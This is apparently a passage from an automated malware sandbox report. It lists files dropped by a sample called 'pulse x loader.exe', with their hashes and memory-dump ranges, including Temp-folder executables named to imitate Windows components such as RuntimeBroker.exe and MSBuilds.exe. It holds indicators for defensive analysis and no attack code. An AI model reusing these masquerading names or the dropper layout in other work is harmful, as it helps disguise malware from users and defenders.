| SHA256 | 940b6f4a619404b55fc875d028ee23bce8d14d548335e330ff04439b9f46397e |
| SHA512 | 91fe4dfbfa3e929f457e2bf8dd441221c4fd334c82c453cad0f78ec695d16dac1263347cc8eb2d29ed5ce74a9e86c38cbd9190f74ad33168acc2a1b2fbc5956c |
memory/3604-143-0x0000000071F80000-0x0000000072730000-memory.dmp
memory/3604-144-0x0000000006760000-0x0000000006770000-memory.dmp
memory/3448-145-0x0000000007630000-0x000000000763A000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ravpggri\ravpggri.cmdline
| MD5 | 23b8ba52aa1ec53f5be36edfdb332130 |
| SHA1 | 514af1c43d311d398b68a2ee75209a6165982b73 |
| SHA256 | 76fe41fc715c86715b6635c64910c7aa88967ad17932c6904d11e68b28f9658c |
| SHA512 | f922374a18fef286c03c3fa7f2c4e38379288fb1efa6b5b957f5fc0a2f1f13eed7129c2884d9c3aa97cd9f637fbe1076b7b80638da8f242bc70955fa3c6b3949 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC3FBA7B35E5B8406D8F98ECD3FFECA56.TMP
| MD5 | 8bbf0aca651a891e81c9323a8af372ee |
| SHA1 | c6ff718e14da6eb73d2733b41c0a95df9a23fc45 |
| SHA256 | 9e6805b532ceb4ee0108f8616675400798da72a930d70a28c8f12529eacea0c2 |
| SHA512 | e9c6bfb01f3d68dbd96e31b7f18d78ea574b7e6c622809a2be0459c4f6b9a4abc204ddc4b6f7526dfdfc872ff543beaa3ceeb89c8f7c7b968c6320740bdfdebb |
memory/3448-150-0x0000000007820000-0x00000000078B6000-memory.dmp
memory/3448-153-0x00000000077D0000-0x00000000077E1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RES77A1.tmp
| MD5 | 0f01057228e65b78cf2dab9f20beb108 |
| SHA1 | 92512597df45a61caac0264dd0d5f82c43f06fed |
| SHA256 | 40605dc8da59c96b3fdfa332acc2df0c8e2cd83ee4f1461da27c6a91e1f5a656 |
| SHA512 | 37fa55ebe032f011572382c97324e0df15c51996b0ed5f898e8227dbcde7c77240b6e75b54c5c75b822c7580ed3ed711397ab313295b8d5a38d068053bed6b97 |
memory/2120-158-0x0000000005070000-0x0000000005080000-memory.dmp
memory/3588-159-0x0000000071F80000-0x0000000072730000-memory.dmp
memory/3268-160-0x00007FFF0AAB0000-0x00007FFF0B571000-memory.dmp
memory/3588-161-0x00000000058A0000-0x00000000058B0000-memory.dmp
memory/828-162-0x0000000007E00000-0x0000000007E0E000-memory.dmp
memory/828-163-0x0000000007E10000-0x0000000007E24000-memory.dmp
memory/3448-164-0x0000000007900000-0x000000000791A000-memory.dmp
memory/3604-165-0x0000000071F80000-0x0000000072730000-memory.dmp
memory/828-166-0x0000000007EF0000-0x0000000007EF8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ea392f15d96a079b67442a2b1ee5998f |
| SHA1 | 34eab205c39edceb1acd264b4772cec1a08aaa4f |
| SHA256 | 7b27fab0be0d0e2d675a325f38be795c73179e168711414559c4af012eddb0c3 |
| SHA512 | e974af30d368e34fa88e5b6c3e19a2f55ccf546d64809c8702f133c80b20edecceab25078430121b69f85b62eef4bc74d171a9ff56ffb36739c9eb9726aafa1c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
memory/828-175-0x0000000071F80000-0x0000000072730000-memory.dmp
memory/3448-176-0x0000000071F80000-0x0000000072730000-memory.dmp
C:\Users\Admin\AppData\Roaming\temp0923
| MD5 | f54e0ad084d6b44f4a7ff94514ba0fb8 |
| SHA1 | 3e168eb2b1b20a00c079ce59941e4235a5129534 |
| SHA256 | f70ff68f63bdbc74f20647d2f96c1c9e4c1b783f059f901a6c2d09b1741fba1a |
| SHA512 | 404f73505792ffb73a82a004afa9f4e7423cacae6dc945532d1434970fc9e4836da9497734ab9e9a41f5b1b2c07ff6a78036d328b332ba78204eede011117a28 |
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
| MD5 | 48dae29db14d44d64729c8fff19543db |
| SHA1 | 585c4f026ce3716e3b729ae1b8fd7a9724648e58 |
| SHA256 | 2c37c839a831feb77d49de79ffd08b2d69e94b036fef27472a631f7d9e702a8b |
| SHA512 | a0224b6eb8d9c707534fc4a11ea0d90909dfedd1e2da22a1bdf55999a1ba9fde2ce6d730955575e64cd970aab756eeda67b733dce3c310642baad7e088de143a |
memory/3388-183-0x00000000006D0000-0x00000000006D8000-memory.dmp
memory/3388-182-0x00007FFF0AAB0000-0x00007FFF0B571000-memory.dmp
memory/4884-184-0x0000000003620000-0x0000000003621000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 18e3d5140f95fe8b494137ec6879116f |
| SHA1 | 82aabc3ddcad3fbaa6bcaf83da242a45936c5d3f |
| SHA256 | 33186cdfb7d7de9875d4c1061995bb61ae3e504a2c45b67a2faf2559789edc24 |
| SHA512 | f21c6eb4ea43f53640fe02d7ff0a459b436f9b79c0d24e96d7da824fadc678ceb75f08b9f3f7c1d0bd5a445aea5e5c3274d200b7910e944723c18c383259f96e |
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | cb6bb067ec9b2a6bc1096d89fd782cff |
| SHA1 | f83d07a5043b382d7505af2672226758e5b0eb45 |
| SHA256 | eb9066951cbf21a44e3ed3d9a784b1d101d69dbb4dbde963e0b68fe6fccd79af |
| SHA512 | 6d358b3a4d7e7bf6f11dbcae738c998a0732b4780a564042e9b9d09e29108179f90b6955c522cac4cb64e85228e5369def53b7ac3a7d82ce572d076af06c0e36 |
memory/2480-207-0x0000022F21FE0000-0x0000022F22000000-memory.dmp
memory/2480-208-0x0000022F226F0000-0x0000022F22710000-memory.dmp
memory/2480-205-0x0000022F22320000-0x0000022F22340000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\j0ereory\j0ereory.cmdline
| MD5 | 104912e10d919c5be8e908558cd9ef25 |
| SHA1 | 871694851f25fd983b7f5fa6751544c4b0e0e6b0 |
| SHA256 | c7889137b8ec5a565dee22def26c1f73f1d9e1fe58968e27f1c1ac886ba16ac1 |
| SHA512 | 4ad9a6b67aad717fd13212506949d03bd3c231a6abff53453bea4e7d1b748c397f5fa1dcb6eec12f93d02c539614a7110467965789e3bd6af58590c6eac80fd9 |
C:\Users\Admin\AppData\Local\Temp\RES925D.tmp
| MD5 | 3ccef185f2100aa3411f24873daeb2cf |
| SHA1 | 81363eb51d2adb333c7dbe408e276dce8d8c3166 |
| SHA256 | aeca783b7ff5bcab841a2acfd58237bc474b8a9412615b08282cebdd6b12e647 |
| SHA512 | c3e75c7d3c93cd5b317c2919d41186d10422a33feed15c249c75aee765a37a7add291fabcf4cb8e96f511fecf1939cccf90d260e76c972829a1e2decaf313d1c |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | dfd1a1f7fb7af3ba04a99c13c5547b66 |
| SHA1 | 6acb1a3ab65a8a3ba433d0d7f341ca0b08c7ddb7 |
| SHA256 | 6c80176d88d9906ff75659edd0d0d3b1ec96e440c9b7827463f33a1cfed12e59 |
| SHA512 | 0eee58ef0e086c3a642167faec3871514008528ead916ff0a3bef5f2d7ecd4729ab2d657d5a9c3940f541caed30f9cceb04f5d3c98293f7483ed48fefe176592 |
\??\c:\Users\Admin\AppData\Local\Temp\yelwxg3g\yelwxg3g.cmdline
| MD5 | 26aa290af9c1ae8f01191dfc7d798ef8 |
| SHA1 | 2b6ecddc3a41986ea0a107e4abfcbed2fb21ccdb |
| SHA256 | cd7b1be5ff356b637994c7a0f81a26ebf79988d6b4e4e1f25d9f460a43150173 |
| SHA512 | 6db0739eb1a91adefbd942278ffdcd27db608b80902e27c729de0e51f6917e35cc0235d63289ed84d471b22881b9732b0767e4d298908b954829f8a6dc66069b |
\??\c:\Users\Admin\AppData\Local\Temp\CSC2119989D5584FA29D37B37DD5B4C475.TMP
| MD5 | 8cb2d1f69e2730b5de634f6b6c12005f |
| SHA1 | 1f9496195f09f58a4e382994717a5da34086d770 |
| SHA256 | f5d616663ac61dc843c8663f2ceaaf6939b974ffd74e6e1be232b3fe8c6667ea |
| SHA512 | d035c16a8d8f09abedc94e10d46983e371d2862b277128fe00184d3a1cbb8a69367c08e150c63b07729938bea6644af4e3913e629969d38978b0d934e9e61eda |
C:\Users\Admin\AppData\Local\Temp\RESA519.tmp
| MD5 | 6facf035e3077fb00564a1e8e9ecc13e |
| SHA1 | e112b5a5e04e8ad469e5d13fb01ae93af24a0e38 |
| SHA256 | b9f68ffa5805ad2831638c739ed1e2b511d23a323f44b62771ae002809e0665a |
| SHA512 | 4ac4afffef6a0b4349eabc20136af98f01700b234a0741d7123cdbaa3c90e16be69d5853d6f198d0019fae88224a116162cd11a473b8af2573e95ed8f3b4ab59 |
memory/2480-305-0x000002271F800000-0x000002272112F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | ceb8c3c0f2249f05f3df8f88d46ae743 |
| SHA1 | 651675ba157c085ce64aa5bb2abbfd6f5efc75c6 |
| SHA256 | a047b5971bf32a48532d2dc9276f3f1208ebaa6ac2efe650bd827344fe86b778 |
| SHA512 | 872d88e2306b40567ec28bb96875fa91a37425e36ad8264a20ba9a29c4552a090fd6336747e7f65056203ce29fedab600aa51684fa525c5417be484bc6b1766a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b64c4cfae9fafe213518b0051f492f0b |
| SHA1 | 352afa7ace9552503ead481dcaa284e1f163978c |
| SHA256 | 55c364723725d0bee76506197be74def296a54b595ddd373d5900ebda93618f4 |
| SHA512 | e2e5bebd8e1bc915323969ecfd2b7394c53d8debd7501b7e7572703d70a889c1eb8914aac1ea5c9ca319974e2219346b15fff35d9594ed9f699b54419fca5aa6 |
\??\c:\Users\Admin\AppData\Local\Temp\xxdjkc4m\xxdjkc4m.cmdline
| MD5 | 100fdbb76f9373ce7ae108f211688224 |
| SHA1 | 89ce19c04a9de9b46bb4d6eabdce5dd9cb4cbe74 |
| SHA256 | 8d1987417895dd19f50220e43dfd96e577c3b690770ee7124d6171d1d679c09d |
| SHA512 | 582234b3e94d89c6694ffbaaed8d4face737da97b359eb305f5477bff70cd7d7929e6f147bfa0751bd707e9cce2c2149247cf1c37bc6f82813f78819ac1c6db1 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCEDEF54CB7CF4460281B829BF5086FD17.TMP
| MD5 | 810535a8ae563d6aa53635a1bb1206ff |
| SHA1 | f5ba39f1a455eb61efe5022b524892249ee75dce |
| SHA256 | 7f2c2a29a5f1c0d994fa4c2fccc11a8f3f5f5d4d97ada18aea94971664c8992f |
| SHA512 | 5662b39b29d33bff2e8de4cf3878a6e58b7a163cc93311f4c82f03e73b239a76bb9064ed0c4a6d01cceb858663462345cae78999cfa3668ef975cf85dfff138d |
C:\Users\Admin\AppData\Local\Temp\RESB6DC.tmp
| MD5 | 34b7f57d0319745a6f978455f63f3826 |
| SHA1 | ffc3255546ed0dae94cb9d25296e7a229446a210 |
| SHA256 | e87fadc280976c6e12bee1d8bedd991d76640c77e6deeb00a9142f72d48bc6a0 |
| SHA512 | 254ffd1019c978ed493e029952c235e4324c1b3d99e338dea807abba7df3ebd2276329ca37620f4fb6cfb97d8cea8d56b975871ca7a686dd6225dc6175922e49 |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | e276de398a9a839c06619f367a84b631 |
| SHA1 | 3f1bd5af66be19202b6efb129e0508945a3610e2 |
| SHA256 | 67203df4f05422cfdecf4571261b47de9d9861b16cdef4503af5b4b6ddbee3ce |
| SHA512 | d063f8b026b996dfec5bf7f62d740ff01d8b36f07987106c55fbf776b6bc893942c0fe2dc039b9cba417d30b1a4658d7ab79a0ceeaf5de613b5f91c271574f63 |
C:\Users\Admin\AppData\Local\Temp\Start.exe
| MD5 | 3b7416cd7114b8ca5eaaf175453ff7c3 |
| SHA1 | 72e8c5e93eee2c0ae5605d2cc95b165b06d374a3 |
| SHA256 | d28d7ee01bee6d280a0ede15b259c270a553a9c5035c19e2d099c1ae730ed9ac |
| SHA512 | 9deab760d2cada671aeacc57c0ff228183ffd5d7e3298f4de729ab3a8e48a4d8d5c0dc10ca35d9f88c1927031ceaae3f266250f28b5a542aff15d3a6110f2edd |
\??\c:\Users\Admin\AppData\Local\Temp\dni4xc0s\dni4xc0s.cmdline
| MD5 | 621684bff380431a0c02ab0c823edd9b |
| SHA1 | 43f3312271050ce5cb1166960b266a04a87149bc |
| SHA256 | fe700c6a447034e460e5c2e31a56243e3a188cc3b76d2ccf2d07bfc000c4c1f2 |
| SHA512 | da8314aafb7a326c08acce8d719f46c33fdf3de0231ebf707f37bfcd1211c27cdb1c906d02bc3f93beef9a095db75314caeaeb36248cd17cb9e380abdc085d19 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC209314B7ECA1444FB9AA8FCCB2D94937.TMP
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\RESD5ED.tmp
| MD5 | 751c4a01c7e20f71b4c4e8ccc95ae8d6 |
| SHA1 | ddd6ccdbe7bee86080774f3c7e78c0e7d57f5a55 |
| SHA256 | c30457c81fef813ffe3e7eac5af48deafec16e644f54ef217e2f55f740e739b6 |
| SHA512 | ff26a92ef1333dd34218560c708f42b056e73e214800dd91420a3177a7dd93f29962498fe343c108711509b3a3b0a0d9210bf2437343421095e69f5336964037 |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | c5c6f01648cb80c43db86320383559ae |
| SHA1 | 68262910d7edf6ed9dfa8d31e9888de7ac27bce3 |
| SHA256 | 42eb6a04d7a1c7a551c97cc2633f14d44f11d1e62a749f10420ac8b69d3fdc7a |
| SHA512 | b6790592463171fa93a40fab1b68cab03e1ab780528999db0800190d4ef9c7866063f933cc16fe73b0b0a78a79dbb594e59c4dbd49a6b7b68a8e8284c208cc7a |
\??\c:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
| MD5 | 2d6073f5362420630979a2d51e6123a2 |
| SHA1 | 5d7f36ac454cef657ac94569ccd6623d1d2e619c |
| SHA256 | 1377c480f7358b0e45bba391ec4656ce1fd1b38b3da987c39f013bf4d8dad31a |
| SHA512 | cc234cd5b428de889a522a3f44b66a47bb0004435588991d79186b014fbc985e78cdc6befb8c62e951076506770c760eb727e0d7fca672bd2d7f67fd29386b8d |
C:\Users\Admin\AppData\Local\Temp\RESE659.tmp
| MD5 | d8b3b726b05d169c28b04adf34f08879 |
| SHA1 | b81d012f003634a779274bc700dcc5a7278d2a07 |
| SHA256 | 00a3cc7775851d3571ecccb22e520a8721955f966fdeeec88416f8a0775b28cb |
| SHA512 | d87175beca7fc54c92d35d9494216b11aa1b64614ebb7a915301a2fdabd3afc5e2c458b3a8849d1bc447fe3a9b15e91ff9c389333ee31d5219611c37ad46d214 |
\??\c:\Users\Admin\AppData\Local\Temp\apg4tez1\apg4tez1.cmdline
| MD5 | 2f6ff55429719b1ebff2cb8920b9f03d |
| SHA1 | e24dc98125a7a22540069ef20ae1fc96ee72d34d |
| SHA256 | 699b75b7c52245743939d16ad3110e9ec3fde23d226be186615c951dcd6701ce |
| SHA512 | 3a6c6aee18fb2bae19adf4081bda79bed5223b3f27f299417f4dca42396eaca322f2a66866e10d5176b7b7486d1a7785b93848ba7bfbbd320922504108342db1 |
memory/5424-495-0x000002512C5A0000-0x000002512C5C0000-memory.dmp
memory/5424-498-0x000002512CCB0000-0x000002512CCD0000-memory.dmp
memory/5424-493-0x000002512C5E0000-0x000002512C600000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\QDDM1QX5\microsoft.windows[1].xml
| MD5 | 2415f1b0b1e5150e9f1e871081fd1fad |
| SHA1 | a79e4bfddc3daf75f059fda3547bd18282d993f7 |
| SHA256 | 3eff25035403aba506d0dbf69c76a22fa90ec66d2094cbf39bc5267a850902ae |
| SHA512 | 5d05da9ec1471dbf91f0c474c8db3897130543ff3c4da70724ce3a36adc38f628264c3dae4f54caef493f7593a0986a944dda0e19e947f3dfc34fc16fbd3e6bb |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 0f3ff3b11b5f9322e7629a6b8da8f0b6 |
| SHA1 | b157e9c5599f7081cfaba12cb7a1f9ddad17c9be |
| SHA256 | b74d139829578c74fd35b78fa96ba119aa6f6404e18087c5923206118fd0de8c |
| SHA512 | 8079709b1c7de223cc6463bdbf962045154f36a0289e59fc560a8f81b5d15ac3363a17246b17593c4a41858a7ac318126b948ca43257c403b82b18996376c660 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 63f28fd81e1797fbbe25a31d1329fa7c |
| SHA1 | 96b0fd472d8d442a737662c6dd39c07ddc06a5fc |
| SHA256 | 236fc68395472c5fe515ffce749f7292e61b7bd9688ea58f4aeae6c34e8b2c23 |
| SHA512 | 7feb3ec923ec9f2a0272bfe01fcdb9b79c29e8587c9c1fe4b4798386372046cd9600c7f1c6c1c026fa38972315e90070c8ec03014a9b25555a8391b91402e949 |
memory/5424-562-0x0000024929C00000-0x000002492B52F000-memory.dmp
memory/5424-666-0x0000024929C00000-0x000002492B52F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CSC4EF71ED814C1400BBAC02FF6BC341D.TMP
| MD5 | e9144225655a1177485a6238f397718e |
| SHA1 | 0618d989814312c38b8005fc469222f891470642 |
| SHA256 | f2ff3d3919bf3120bd18978b0225c56b53eec3a645493f7fe08344671cacb21d |
| SHA512 | 392b9684bc1c0d054a397bb8ed54bc682a59ea6c1c12abad5d70ec2f0065afec4645cae8c2672ec4571d5763397092388b944cd5c7582a4aa685ecd4e3a0c2a4 |
C:\Users\Admin\AppData\Local\Temp\CSC98B123E02A0945A5B6756A807C99F6DB.TMP
| MD5 | 6d4e315ddb659723cf270858a8023839 |
| SHA1 | 0df893c7f7f48483e29d8db81bfabc8456ba24a9 |
| SHA256 | f6528ea00f868ca00663e6aeff8def75c2db4a0b7012d9836f9267679b0e47f0 |
| SHA512 | 70a5bb19c9384117a21eeb1ce2e44ffc055dbf5ff958e0b912823c353a283606bafb1b7d7a5c942ffe8ecd3890c88b88597d027c19952156fe959962422339a6 |